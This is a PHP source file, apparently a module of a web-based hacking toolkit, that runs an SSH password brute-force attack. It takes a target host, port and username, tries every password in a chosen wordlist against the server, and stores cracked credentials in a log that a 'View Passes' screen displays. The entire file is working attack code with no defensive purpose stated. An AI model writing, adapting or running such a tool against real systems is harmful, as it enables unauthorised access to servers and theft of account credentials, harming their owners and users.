<?php
/*
Handler for xSSH

ModGlue Variables:
$_CONTEXT['thc_xh']['log']
$_CONTEXT['thc_xh']['results']['result']
$_CONTEXT['thc_xh']['results']['password']
$_CONTEXT['thc_xh']['port']
$_CONTEXT['thc_xh']['user']
$_CONTEXT['thc_xh']['host']
$_CONTEXT['thc_xh']['keys']
$_CONTEXT['thc_xh']['wordlistname']
$_CONTEXT['thc_xh']['wordlist']
$_CONTEXT['thc_xh']['loginattempts']
$_CONTEXT['thc_xh']['result']
$_CONTEXT['thc_xh']['connection']
$_CONTEXT['thc_xh']['wordlistwords']
$_CONTEXT['thc_xh']['currentpass']
$_CONTEXT['thc_xh']['writetext']
$_CONTEXT['thc_xh']['totaltime']
$_CONTEXT['thc_xh']['resultstring']

Author: Remco Kouw
Site: http://www.hacksuite.com
Last Edit: 02-05-2024
*/
set_time_limit(0);
// set variable to be able to save a task
$_MODULE_C = "thc_xh";
$_CONTEXT['thc_xh'] = array();
include_once("../../Includes/screen_header.php");
include_once($_PATHS['functions_root']."/scrn.php");
$_CONTEXT['thc_xh']['log'] = $_PATHS['module_default_root']."/accounts.php";
$_CONTEXT['thc_xh']['results'] = array();
$_CONTEXT['thc_xh']['results']['result'] = false;
$_CONTEXT['thc_xh']['results']['password'] = false;
// options
$sOptions = "<b>logging:</b> ".($_CONTEXT['log']==true ? "on" : "off")."<br>\n";
$sOptions .= "<b>silence:</b> ".($_CONTEXT['silent']==true ? "on" : "off")."<br>\n";
$sOptions .= "<b>verbose:</b> ".($_CONTEXT['verbose']==true ? "on" : "off")."\n";
// template for screen file output
include_once($_PATHS['style_root']."/screen.php");
if(!function_exists("ssh2_connect")){
	die(Screen($sOut."SSH isn't enabled in your php configuration",$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
if(isset($_POST['submit'])){
	switch($_POST['submit']){
		// quick validation first of the input
		case"Generate Attack":
		if($_POST['sUser']==""){
			die(Screen($sOut."No user has been specified",$_CONTEXT['verbose'],$_CONTEXT['silent']));
		}
		if($_POST['sHost']==""){
			die(Screen($sOut."No host has been specified",$_CONTEXT['verbose'],$_CONTEXT['silent']));
		}
		$_CONTEXT['thc_xh']['port'] = !preg_match('/^(?:[1-9]\d{0,3}|[1-5]\d{4}|6[0-4]\d{3}|65[0-4]\d{2}|655[0-2]\d|6553[0-5])$/',$_POST['iPort']) ? 22 : $_POST['iPort'];
		$_CONTEXT['thc_xh']['user'] = $_POST['sUser'];
		$_CONTEXT['thc_xh']['host'] = $_POST['sHost'];
		break;
		// View Passes
		case"View Passes":
		echo Screen($sOut,$_CONTEXT['verbose'],$_CONTEXT['silent']);
		if(!function_exists("RawToArray")){
			include_once($_PATHS['functions_root']."/raw_to_array.php");
		}
		if(false==($_CONTEXT['thc_xh']['keys'] = RawToArray($_CONTEXT['thc_xh']['log']))){
			echo Screen("<b id=h7>[no passwords discovered yet]</b>",$_CONTEXT['verbose'],$_CONTEXT['silent']);
		}
		else{
			for($x=0;$x<count($_CONTEXT['thc_xh']['keys']);$x++){
				echo Screen("<b>".date($_CONTEXT['time_pattern'].' H:i:s',$_CONTEXT['thc_xh']['keys'][$x][0])."</b> password for user <b>".$_CONTEXT['thc_xh']['keys'][$x][1]."</b> is <b>".$_CONTEXT['thc_xh']['keys'][$x][2]."</b><br />\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
			}
		}
		exit;
		break;
		default:
		// default template
		die(Screen($sOut.$sOptions.$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
	}
}
else{
	die(Screen($sOut.$sOptions.$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
}
$_CONTEXT['thc_xh']['wordlistname'] = $_PATHS['wordlists_root']."/".ExploitFilter($_POST['sWordlist'],0,1);
if(false===($_CONTEXT['thc_xh']['wordlist'] = @file($_CONTEXT['thc_xh']['wordlistname']))){
	$_CONTEXT['errors'][] = array('error'=>'Wordlist doesn\'t exist','type'=>'0','fatal'=>'1','screen'=>'1','line'=>__LINE__,'file'=>__FILE__);
	include_once($_PATHS['end']);
}
include($_PATHS['includes_root']."/task_start.php");
echo Screen($sOut,$_CONTEXT['verbose'],$_CONTEXT['silent']);
echo Screen("<br />\n<b>Running..</b><p>\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
// spit fire...
flush();
ob_flush();
echo Screen("<b>trying to connect with ".htmlspecialchars($_POST['sHost'])." on port ".$_CONTEXT['thc_xh']['port'].":</b><br />\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
flush();
ob_flush();
$_CONTEXT['thc_xh']['loginattempts'] = 0;
$_CONTEXT['thc_xh']['result'] = false;
$_CONTEXT['thc_xh']['connection'] = @ssh2_connect($_CONTEXT['thc_xh']['host'],$_CONTEXT['thc_xh']['port']);
if(false!==($_CONTEXT['thc_xh']['wordlistwords'] = @count($_CONTEXT['thc_xh']['wordlist']))){
	for($x=0;$x<$_CONTEXT['thc_xh']['wordlistwords'];$x++){
		// go through passwords
		$_CONTEXT['thc_xh']['currentpass'] = trim($_CONTEXT['thc_xh']['wordlist'][$x]);
		$_CONTEXT['thc_xh']['loginattempts']++;
		echo Screen("[".date('H:i:s',time())."] attempt ".$_CONTEXT['thc_xh']['loginattempts'].": ".$_CONTEXT['thc_xh']['currentpass']." =&gt; ",$_CONTEXT['verbose'],$_CONTEXT['silent']);
		if(is_resource($_CONTEXT['thc_xh']['connection'])){
			if(ssh2_auth_password($_CONTEXT['thc_xh']['connection'],$_CONTEXT['thc_xh']['user'],$_CONTEXT['thc_xh']['currentpass'])){
				echo Screen("<b id=h6>success</b><br />\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
				$_CONTEXT['thc_xh']['writetext'] = time()."|".$_CONTEXT['thc_xh']['user']."|".$_CONTEXT['thc_xh']['currentpass']."|".$_CONTEXT['thc_xh']['host']."\n";
				$_CONTEXT['thc_xh']['result'] = true;
				break;
			}
			else{
				echo Screen("<b id=h7>failed</b><br />\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
			}
		}
		else{
			echo Screen("<p><b>connection was terminated</b></p>\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
			break;
		}
		flush();
		ob_flush();
	}
}
else{
	echo Screen("No data in wordlist",$_CONTEXT['verbose'],$_CONTEXT['silent']);
}
// update entry in background task file
$_CONTEXT['thc_xh']['totaltime'] = time()-$_CONTEXT['start_task'];
$_CONTEXT['thc_xh']['resultstring'] = $_CONTEXT['thc_xh']['results']['result'] ? "successfully got password after ".$_CONTEXT['thc_xh']['loginattempts']." attempts in ".$_CONTEXT['thc_xh']['totaltime']."(s)" : "failed to get password, please try some different wordlist";
echo Screen(WriteF($_CONTEXT['thc_xh']['log'],$_CONTEXT['thc_xh']['writetext']) ? "<p>successfully logged password</p>" : "<p>failed to log password</p>",$_CONTEXT['verbose'],$_CONTEXT['silent']);
echo Screen($_CONTEXT['thc_xh']['resultstring'],$_CONTEXT['verbose'],$_CONTEXT['silent']);
include($_PATHS['includes_root']."/task_end.php");
echo Screen($sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']);
?>